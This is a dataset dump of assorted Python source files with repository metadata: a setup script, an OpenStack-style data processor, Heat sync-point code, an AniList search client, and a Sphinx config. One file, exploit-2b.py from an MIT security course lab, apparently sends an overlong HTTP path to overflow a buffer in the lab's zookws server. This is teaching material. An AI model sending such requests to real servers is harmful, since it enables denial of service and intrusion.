text stringlengths 4 1.02M | meta dict |
|---|---|
import setuptools
# In python < 2.7.4, a lazy loading of package `pbr` will break
# setuptools if some other modules registered functions in `atexit`.
# solution from: http://bugs.python.org/issue15881#msg170215
try:
import multiprocessing # noqa
except ImportError:
pass
setuptools.setup(
setup_requires=['pbr'],
pbr=True)
| {
"content_hash": "436a183f6cc62863024f5100c044ce9d",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 68,
"avg_line_length": 26.384615384615383,
"alnum_prop": 0.7288629737609329,
"repo_name": "sand8080/python-sketches",
"id": "afe4430c30270d1ebaf9e2b662ed05a796d2d3e6",
"size": "958",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "8833"
}
],
"symlink_target": ""
} |
import collections
from oslo_config import cfg
import psutil
import six
from six.moves.urllib import parse
import yaml
from spectrometer.openstack.common import log as logging
from spectrometer.processor import config
from spectrometer.processor import default_data_processor
from spectrometer.processor import mls
from spectrometer.processor import mps
from spectrometer.processor import rcs
from spectrometer.processor import record_processor
from spectrometer.processor import runtime_storage
from spectrometer.processor import utils
from spectrometer.processor import vcs
LOG = logging.getLogger(__name__)
def get_pids():
# needs to be compatible with psutil >= 1.1.1 since it's a global req.
PSUTIL2 = psutil.version_info >= (2, 0)
result = set([])
for pid in psutil.get_pid_list():
try:
p = psutil.Process(pid)
name = p.name() if PSUTIL2 else p.name
if name == 'uwsgi':
LOG.debug('Found uwsgi process, pid: %s', pid)
result.add(pid)
except Exception as e:
LOG.debug('Exception while iterating process list: %s', e)
pass
return result
def update_pids(runtime_storage):
pids = get_pids()
if not pids:
return
runtime_storage.active_pids(pids)
def _merge_commits(original, new):
if new['branches'] < original['branches']:
return False
else:
original['branches'] |= new['branches']
return True
def _record_typer(record_iterator, record_type):
for record in record_iterator:
record['record_type'] = record_type
yield record
def process_repo(repo, runtime_storage_inst, record_processor_inst):
uri = repo['uri']
LOG.debug('Processing repo uri %s' % uri)
vcs_inst = vcs.get_vcs(repo, cfg.CONF.sources_root)
vcs_inst.fetch()
rcs_inst = rcs.get_rcs(repo, cfg.CONF.review_uri)
rcs_inst.setup(key_filename=cfg.CONF.ssh_key_filename,
username=cfg.CONF.ssh_username)
branches = set(['master'])
for release in repo.get('releases'):
if 'branch' in release:
branches.add(release['branch'])
for branch in branches:
LOG.debug('Processing repo %s, branch %s', uri, branch)
vcs_key = 'vcs:' + str(parse.quote_plus(uri) + ':' + branch)
last_id = runtime_storage_inst.get_by_key(vcs_key)
commit_iterator = vcs_inst.log(branch, last_id)
commit_iterator_typed = _record_typer(commit_iterator, 'commit')
processed_commit_iterator = record_processor_inst.process(
commit_iterator_typed)
runtime_storage_inst.set_records(
processed_commit_iterator, _merge_commits)
last_id = vcs_inst.get_last_id(branch)
runtime_storage_inst.set_by_key(vcs_key, last_id)
LOG.debug('Processing reviews for repo %s, branch %s', uri, branch)
rcs_key = 'rcs:' + str(parse.quote_plus(uri) + ':' + branch)
last_id = runtime_storage_inst.get_by_key(rcs_key)
review_iterator = rcs_inst.log(branch, last_id)
review_iterator_typed = _record_typer(review_iterator, 'review')
processed_review_iterator = record_processor_inst.process(
review_iterator_typed)
runtime_storage_inst.set_records(processed_review_iterator,
utils.merge_records)
last_id = rcs_inst.get_last_id(branch)
runtime_storage_inst.set_by_key(rcs_key, last_id)
def process_mail_list(uri, runtime_storage_inst, record_processor_inst):
mail_iterator = mls.log(uri, runtime_storage_inst)
mail_iterator_typed = _record_typer(mail_iterator, 'email')
processed_mail_iterator = record_processor_inst.process(
mail_iterator_typed)
runtime_storage_inst.set_records(processed_mail_iterator)
def process_member_list(uri, runtime_storage_inst, record_processor_inst):
mps_inst = mps.get_mps(uri)
member_iterator = mps_inst.log(uri, runtime_storage_inst,
cfg.CONF.days_to_update_members)
member_iterator_typed = _record_typer(member_iterator, 'member')
processed_member_iterator = record_processor_inst.process(
member_iterator_typed)
runtime_storage_inst.set_records(processed_member_iterator)
def update_members(runtime_storage_inst, record_processor_inst):
member_lists = runtime_storage_inst.get_by_key('member_lists') or []
for member_list in member_lists:
process_member_list(member_list, runtime_storage_inst,
record_processor_inst)
def update_records(runtime_storage_inst, record_processor_inst):
repos = utils.load_repos(runtime_storage_inst)
# Update member list
for repo in repos:
process_repo(repo, runtime_storage_inst, record_processor_inst)
mail_lists = runtime_storage_inst.get_by_key('mail_lists') or []
for mail_list in mail_lists:
process_mail_list(mail_list, runtime_storage_inst,
record_processor_inst)
record_processor_inst.update()
def apply_corrections(uri, runtime_storage_inst):
LOG.info('Applying corrections from uri %s', uri)
corrections = utils.read_json_from_uri(uri)
if not corrections:
LOG.error('Unable to read corrections from uri: %s', uri)
return
valid_corrections = []
for c in corrections['corrections']:
if 'primary_key' in c:
valid_corrections.append(c)
else:
LOG.warn('Correction misses primary key: %s', c)
runtime_storage_inst.apply_corrections(valid_corrections)
def _read_official_programs_yaml(program_list_uri, release_names):
LOG.debug('Process list of programs from uri: %s', program_list_uri)
content = yaml.safe_load(utils.read_uri(program_list_uri))
module_groups = collections.defaultdict(
lambda: {'modules': [], 'releases': collections.defaultdict(list)})
bootstrap = module_groups['official-bootstrap']
bootstrap['tag'] = 'project_type'
bootstrap['module_group_name'] = 'official-bootstrap'
incubation = module_groups['official-incubation']
incubation['tag'] = 'project_type'
incubation['module_group_name'] = 'official-incubation'
mature = module_groups['official-mature']
mature['tag'] = 'project_type'
mature['module_group_name'] = 'official-mature'
core = module_groups['official-core']
core['tag'] = 'project_type'
core['module_group_name'] = 'official-core'
RELEASE_TAGS = ['bootstrapped-since', 'incubated-since',
'mature-since', 'core-since']
for name, info in six.iteritems(content):
# for one program
group_id = name.lower()
if 'codename' in info:
name = '%s (%s)' % (info['codename'], name)
group_id = '%s-group' % info['codename'].lower()
module_groups[group_id]['module_group_name'] = name
module_groups[group_id]['tag'] = 'program'
for module in info['projects']:
module_name = module['repo'].split('/')[1]
module_groups[group_id]['modules'].append(module_name)
project_type = 'official-other'
if (any(key in module for key in RELEASE_TAGS)):
releases = [r.lower() for r in release_names]
for release_name in releases:
if release_name == module.get('bootstrapped-since'):
project_type = 'official-bootstrap'
elif release_name == module.get('incubated-since'):
project_type = 'official-incubation'
elif release_name == module.get('mature-since'):
project_type = 'official-mature'
elif release_name == module.get('core-since'):
project_type = 'official-core'
module_groups[project_type]['releases'][
release_name].append(module_name)
else:
module_groups['other']['modules'].append(module_name)
# set ids for module groups
for group_id, group in six.iteritems(module_groups):
group['id'] = group_id
return module_groups
def process_program_list(runtime_storage_inst, program_list_uri):
module_groups = runtime_storage_inst.get_by_key('module_groups') or {}
release_names = [r['release_name'].lower()
for r in runtime_storage_inst.get_by_key('releases')[1:]]
official_module_groups = _read_official_programs_yaml(
program_list_uri, release_names)
LOG.debug('Update module groups with official: %s', official_module_groups)
module_groups.update(official_module_groups)
# register modules as module groups
repos = runtime_storage_inst.get_by_key('repos') or []
for repo in repos:
module = repo['module']
module_groups[module] = utils.make_module_group(module, tag='module')
# register module 'unknown' - used for emails not mapped to any module
module_groups['unknown'] = utils.make_module_group('unknown', tag='module')
runtime_storage_inst.set_by_key('module_groups', module_groups)
def main():
# init conf and logging
conf = cfg.CONF
conf.register_cli_opts(config.OPTS)
conf.register_opts(config.OPTS)
conf()
logging.setup('spectrometer')
LOG.info('Logging enabled')
runtime_storage_inst = runtime_storage.get_runtime_storage(
cfg.CONF.runtime_storage_uri)
default_data = utils.read_json_from_uri(cfg.CONF.default_data_uri)
if not default_data:
LOG.critical('Unable to load default data')
return not 0
default_data_processor.process(runtime_storage_inst,
default_data,
cfg.CONF.sources_root,
cfg.CONF.force_update)
process_program_list(runtime_storage_inst, cfg.CONF.program_list_uri)
update_pids(runtime_storage_inst)
record_processor_inst = record_processor.RecordProcessor(
runtime_storage_inst)
update_records(runtime_storage_inst, record_processor_inst)
apply_corrections(cfg.CONF.corrections_uri, runtime_storage_inst)
# long operation should be the last
update_members(runtime_storage_inst, record_processor_inst)
runtime_storage_inst.set_by_key('runtime_storage_update_time',
utils.date_to_timestamp('now'))
if __name__ == '__main__':
main()
| {
"content_hash": "b305be495c16b5437b53b308c465c6d3",
"timestamp": "",
"source": "github",
"line_count": 292,
"max_line_length": 79,
"avg_line_length": 36.04109589041096,
"alnum_prop": 0.6375902698593691,
"repo_name": "dave-tucker/spectrometer",
"id": "501142e634d6da498b63ffad0fc49dd9b941cf81",
"size": "11106",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "spectrometer/processor/main.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "40267"
},
{
"name": "HTML",
"bytes": "89315"
},
{
"name": "JavaScript",
"bytes": "62950"
},
{
"name": "Pascal",
"bytes": "104"
},
{
"name": "Puppet",
"bytes": "25860"
},
{
"name": "Python",
"bytes": "301595"
},
{
"name": "Ruby",
"bytes": "220661"
},
{
"name": "Shell",
"bytes": "3005"
}
],
"symlink_target": ""
} |
"""Starters declarations.
"""
| {
"content_hash": "cc420409eaa6c74d73e6c15c3b2e5dc0",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 25,
"avg_line_length": 10.333333333333334,
"alnum_prop": 0.6451612903225806,
"repo_name": "Ecpy/ecpy",
"id": "df1b507a3d32e7ce2bd7c0a548767ec24f6fbdc5",
"size": "414",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "exopy/instruments/starters/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "162"
},
{
"name": "Python",
"bytes": "1344669"
},
{
"name": "Shell",
"bytes": "420"
}
],
"symlink_target": ""
} |
import ast
import eventlet
import random
import six
from oslo_log import log as logging
from heat.common import exception
from heat.objects import sync_point as sync_point_object
LOG = logging.getLogger(__name__)
KEY_SEPERATOR = ':'
def _dump_list(items, separator=', '):
return separator.join(map(str, items))
def make_key(*components):
assert len(components) >= 2
return _dump_list(components, KEY_SEPERATOR)
def create(context, entity_id, traversal_id, is_update, stack_id):
"""Creates a sync point entry in DB."""
values = {'entity_id': entity_id, 'traversal_id': traversal_id,
'is_update': is_update, 'atomic_key': 0,
'stack_id': stack_id, 'input_data': {}}
return sync_point_object.SyncPoint.create(context, values)
def get(context, entity_id, traversal_id, is_update):
"""Retrieves a sync point entry from DB."""
sync_point = sync_point_object.SyncPoint.get_by_key(context, entity_id,
traversal_id,
is_update)
if sync_point is None:
key = (entity_id, traversal_id, is_update)
raise exception.EntityNotFound(entity='Sync Point', name=key)
return sync_point
def delete_all(context, stack_id, traversal_id):
"""Deletes all sync points of a stack associated with a traversal_id."""
return sync_point_object.SyncPoint.delete_all_by_stack_and_traversal(
context, stack_id, traversal_id
)
def update_input_data(context, entity_id, current_traversal,
is_update, atomic_key, input_data):
rows_updated = sync_point_object.SyncPoint.update_input_data(
context, entity_id, current_traversal, is_update, atomic_key,
input_data)
return rows_updated
def _str_pack_tuple(t):
return u'tuple:' + str(t)
def _str_unpack_tuple(s):
s = s[s.index(':') + 1:]
return ast.literal_eval(s)
def _deserialize(d):
d2 = {}
for k, v in d.items():
if isinstance(k, six.string_types) and k.startswith(u'tuple:('):
k = _str_unpack_tuple(k)
if isinstance(v, dict):
v = _deserialize(v)
d2[k] = v
return d2
def _serialize(d):
d2 = {}
for k, v in d.items():
if isinstance(k, tuple):
k = _str_pack_tuple(k)
if isinstance(v, dict):
v = _serialize(v)
d2[k] = v
return d2
def deserialize_input_data(db_input_data):
db_input_data = db_input_data.get('input_data')
if not db_input_data:
return {}
return dict(_deserialize(db_input_data))
def serialize_input_data(input_data):
return {'input_data': _serialize(input_data)}
def sync(cnxt, entity_id, current_traversal, is_update, propagate,
predecessors, new_data):
rows_updated = None
sync_point = None
input_data = None
nconflicts = max(0, len(predecessors) - 2)
# limit to 10 seconds
max_wt = min(nconflicts * 0.01, 10)
while not rows_updated:
sync_point = get(cnxt, entity_id, current_traversal, is_update)
input_data = deserialize_input_data(sync_point.input_data)
input_data.update(new_data)
rows_updated = update_input_data(
cnxt, entity_id, current_traversal, is_update,
sync_point.atomic_key, serialize_input_data(input_data))
# don't aggressively spin; induce some sleep
if not rows_updated:
eventlet.sleep(random.uniform(0, max_wt))
waiting = predecessors - set(input_data)
key = make_key(entity_id, current_traversal, is_update)
if waiting:
LOG.debug('[%s] Waiting %s: Got %s; still need %s',
key, entity_id, _dump_list(input_data), _dump_list(waiting))
else:
LOG.debug('[%s] Ready %s: Got %s',
key, entity_id, _dump_list(input_data))
propagate(entity_id, serialize_input_data(input_data))
| {
"content_hash": "52bd9df970122debb94fcdca9f32396c",
"timestamp": "",
"source": "github",
"line_count": 132,
"max_line_length": 78,
"avg_line_length": 30.015151515151516,
"alnum_prop": 0.6110550227158001,
"repo_name": "cwolferh/heat-scratch",
"id": "56f08d614c21d2be6fd0dc68556e040621713c3c",
"size": "4510",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "heat/engine/sync_point.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "8338769"
},
{
"name": "Shell",
"bytes": "56516"
}
],
"symlink_target": ""
} |
import json
import requests
class ASearch:
def __init__(self, settings):
self.settings = settings
def character(self, term, page = 1, perpage = 3):
"""
Search for a character by term.
Results are paginated by default. Page specifies which page we're on.
Perpage specifies how many per page to request. 3 is just the example from the API docs.
:param term str: Name to search by
:param page int: Which page are we requesting? Starts at 1.
:param perpage int: How many results per page are we requesting?
:return: Json object with returned results.
:rtype: Json object with returned results.
"""
query_string = """\
query ($query: String, $page: Int, $perpage: Int) {
Page (page: $page, perPage: $perpage) {
pageInfo {
total
currentPage
lastPage
hasNextPage
}
characters (search: $query) {
id
name {
first
last
}
image {
large
}
}
}
}
"""
vars = {"query": term, "page": page, "perpage": perpage}
r = requests.post(self.settings['apiurl'],
headers=self.settings['header'],
json={'query': query_string, 'variables': vars})
jsd = r.text
try:
jsd = json.loads(jsd)
except ValueError:
return None
else:
return jsd
def anime(self, term, page = 1, perpage = 3):
"""
Search for an anime by term.
Results are paginated by default. Page specifies which page we're on.
Perpage specifies how many per page to request. 3 is just the example from the API docs.
:param term str: Name to search by
:param page int: Which page are we requesting? starts at 1.
:param perpage int: How many results per page? defaults to 3.
:return: List of dictionaries which are anime objects or None
:rtype: list of dict or NoneType
"""
query_string = """\
query ($query: String, $page: Int, $perpage: Int) {
Page (page: $page, perPage: $perpage) {
pageInfo {
total
currentPage
lastPage
hasNextPage
}
media (search: $query, type: ANIME) {
id
title {
romaji
english
}
coverImage {
large
}
averageScore
popularity
episodes
season
hashtag
isAdult
}
}
}
"""
vars = {"query": term, "page": page, "perpage": perpage}
r = requests.post(self.settings['apiurl'],
headers=self.settings['header'],
json={'query': query_string, 'variables': vars})
jsd = r.text
try:
jsd = json.loads(jsd)
except ValueError:
return None
else:
return jsd
def manga(self, term, page = 1, perpage = 3):
"""
Search for a manga by term.
Results are paginated by default. Page specifies which page we're on.
Perpage specifies how many per page to request. 3 is just the example from the API docs.
:param term str: Name to search by
:param page int: Which page are we requesting? Starts at 1.
:param perpage int: How many results per page? defaults to 3.
:return: List of dictionaries which are manga objects or None
:rtype: list of dict or NoneType
"""
query_string = """\
query ($query: String, $page: Int, $perpage: Int) {
Page (page: $page, perPage: $perpage) {
pageInfo {
total
currentPage
lastPage
hasNextPage
}
media (search: $query, type: MANGA) {
id
title {
romaji
english
}
coverImage {
large
}
averageScore
popularity
chapters
volumes
season
hashtag
isAdult
}
}
}
"""
vars = {"query": term, "page": page, "perpage": perpage}
r = requests.post(self.settings['apiurl'],
headers=self.settings['header'],
json={'query': query_string, 'variables': vars})
jsd = r.text
try:
jsd = json.loads(jsd)
except ValueError:
return None
else:
return jsd
def staff(self, term, page = 1, perpage = 3):
"""
Search for staff by term. Staff means actors, directors, etc.
Results are paginated by default. Page specifies which page we're on.
Perpage specifies how many per page to request. 3 is just the example from the API docs.
:param term str: Name to search by
:param page int: What page are we requesting? Starts at 1.
:param perpage int: How many results per page? Defaults to 3.
:return: List of dictionaries which are staff objects or None
:rtype: list of dict or NoneType
"""
query_string = """\
query ($query: String, $page: Int, $perpage: Int) {
Page (page: $page, perPage: $perpage) {
pageInfo {
total
currentPage
lastPage
hasNextPage
}
staff (search: $query) {
id
name {
first
last
}
image {
large
}
}
}
}
"""
vars = {"query": term, "page": page, "perpage": perpage}
r = requests.post(self.settings['apiurl'],
headers=self.settings['header'],
json={'query': query_string, 'variables': vars})
jsd = r.text
try:
jsd = json.loads(jsd)
except ValueError:
return None
else:
return jsd
def studio(self, term, page = 1, perpage = 3):
"""
Search for a studio by term.
Results are paginated by default. Page specifies which page we're on.
Perpage specifies how many per page to request. 3 is just the example from the API docs.
:param term str: Name to search by
:param page int: What page are we requesting? starts at 1.
:param perpage int: How many results per page? defaults to 3.
:return: List of dictionaries which are studio objects or None
:rtype: list of dict or NoneType
"""
query_string = """\
query ($query: String, $page: Int, $perpage: Int) {
Page (page: $page, perPage: $perpage) {
pageInfo {
total
currentPage
lastPage
hasNextPage
}
studios (search: $query) {
id
name
}
}
}
"""
vars = {"query": term, "page": page, "perpage": perpage}
r = requests.post(self.settings['apiurl'],
headers=self.settings['header'],
json={'query': query_string, 'variables': vars})
jsd = r.text
try:
jsd = json.loads(jsd)
except ValueError:
return None
else:
return jsd
| {
"content_hash": "d2b918e2226d0496103e5b1e3e81d472",
"timestamp": "",
"source": "github",
"line_count": 249,
"max_line_length": 96,
"avg_line_length": 35.859437751004016,
"alnum_prop": 0.42591555605330944,
"repo_name": "ccubed/PyMoe",
"id": "b31340fd1330f7dc74d6deb57b4a07394ab471c1",
"size": "8929",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Pymoe/Anilist/search.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "106985"
}
],
"symlink_target": ""
} |
class Stack(object):
def __init__(self):
#@initialize the Data structure
self.items = []
def isEmpty(self):
#@rtype: boolean
return self.items == []
def push(self,item):
#@type item:int
#@rtype: void
self.items.append(item)
def pop(self):
#@rtype: int
return self.items.pop()
def peek(self):
#@rtype:int
return self.items[len(self.items)-1]
def size(self):
#@rtype: int
return len(self.items)
if __name__ == "__main__":
obj = Stack()
print("obj is initialized as: ",obj.items)
obj.push(1)
obj.push(9)
obj.push(5)
obj.push(16)
obj.push(3)
print("After several pushes: ",obj.items)
print("Now is empty? ",obj.isEmpty())
print("Now the peek is: ",obj.peek())
print("the size is:", obj.size())
obj.pop()
obj.pop()
print("After several pushes: ",obj.items)
print("Now is empty? ",obj.isEmpty())
print("Now the peek is: ",obj.peek())
print("the size is:", obj.size())
| {
"content_hash": "24da9a03ce4c4aae7d000944dfbf3c64",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 46,
"avg_line_length": 23.133333333333333,
"alnum_prop": 0.5581171950048031,
"repo_name": "rush2catch/algorithms-leetcode",
"id": "79b4bbd6695d02801a79939cbb5b21d764f08b69",
"size": "1727",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Basic Data Structures/stack/stack.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "162421"
}
],
"symlink_target": ""
} |
from exceptions import Exception
__doc__ = """
Various exception classes, nothing much to see here. move along...
"""
class LoginException(Exception):
pass
class MissingException(Exception):
pass
class MissingProperty(MissingException):
pass
class MissingClientUser(MissingException):
pass
class MissingClientProfile(MissingException):
pass
class MissingACLProfileException(MissingException):
pass
| {
"content_hash": "edad446fac23666f8d36add567a17a53",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 66,
"avg_line_length": 15,
"alnum_prop": 0.7540229885057471,
"repo_name": "unixunion/python-libsolace",
"id": "ad590d8a74b9ecd842677db3cc5e22b4398b48a3",
"size": "435",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "libsolace/Exceptions.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "8090"
},
{
"name": "Python",
"bytes": "400777"
},
{
"name": "Shell",
"bytes": "745"
}
],
"symlink_target": ""
} |
import sys
import socket
import traceback
import urllib
import struct
####
## You might find it useful to define variables that store various
## stack or function addresses from the zookd / zookfs processes,
## which you can then use in build_exploit(); the following are just
## examples.
stack_buffer = 0x34567890
stack_saved_ebp = 0x12345678
stack_retaddr = stack_saved_ebp + 4
## This is the function that you should modify to construct an
## HTTP request that will cause a buffer overflow in some part
## of the zookws web server and exploit it.
def build_exploit(shellcode):
## Things that you might find useful in constructing your exploit:
## urllib.quote(s)
## returns string s with "special" characters percent-encoded
## struct.pack("<I", x)
## returns the 4-byte binary encoding of the 32-bit integer x
## variables for program addresses (ebp, buffer, retaddr=ebp+4)
path = "/" + '0'*1025;
req = "GET "+ path +" HTTP/1.0\r\n" + \
"\r\n"
return req
####
def send_req(host, port, req):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Connecting to %s:%d..." % (host, port))
sock.connect((host, port))
print("Connected, sending request...")
sock.send(req)
print("Request sent, waiting for reply...")
rbuf = sock.recv(1024)
resp = ""
while len(rbuf):
resp = resp + rbuf
rbuf = sock.recv(1024)
print("Received reply.")
sock.close()
return resp
####
if len(sys.argv) != 3:
print("Usage: " + sys.argv[0] + " host port")
exit()
try:
shellfile = open("shellcode.bin", "r")
shellcode = shellfile.read()
req = build_exploit(shellcode)
print("HTTP request:")
print(req)
resp = send_req(sys.argv[1], int(sys.argv[2]), req)
print("HTTP response:")
print(resp)
except:
print("Exception:")
print(traceback.format_exc())
| {
"content_hash": "ceabe220c85d3b58bb9041d90cbcf90c",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 70,
"avg_line_length": 25.7027027027027,
"alnum_prop": 0.6456361724500526,
"repo_name": "Kaffa-MY/mit6.858Fall2014",
"id": "054b41eac5333e92a0a84b63fc7915137df4ef2b",
"size": "1920",
"binary": false,
"copies": "1",
"ref": "refs/heads/lab1",
"path": "exploit-2b.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "767"
},
{
"name": "C",
"bytes": "24870"
},
{
"name": "CSS",
"bytes": "1117"
},
{
"name": "HTML",
"bytes": "5989"
},
{
"name": "JavaScript",
"bytes": "169"
},
{
"name": "Makefile",
"bytes": "2329"
},
{
"name": "Python",
"bytes": "31926"
},
{
"name": "Shell",
"bytes": "2595"
},
{
"name": "VimL",
"bytes": "148"
}
],
"symlink_target": ""
} |
import sys
import os
import shlex
import sphinx_rtd_theme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.ifconfig',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'atmospy'
copyright = u'2016, David H Hagan'
author = u'David H Hagan'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
#version = u'0.1.0'
# The full version, including alpha/beta/rc tags.
#release = u'0.1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'atmospydoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'atmospy.tex', u'atmospy Documentation',
u'David H Hagan', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'atmospy', u'atmospy Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'atmospy', u'atmospy Documentation',
author, 'atmospy', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# The basename for the epub file. It defaults to the project name.
#epub_basename = project
# The HTML theme for the epub output. Since the default themes are not optimized
# for small screen space, using the same theme for HTML and epub output is
# usually not wise. This defaults to 'epub', a theme designed to save visual
# space.
#epub_theme = 'epub'
# The language of the text. It defaults to the language option
# or 'en' if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# A sequence of (type, uri, title) tuples for the guide element of content.opf.
#epub_guide = ()
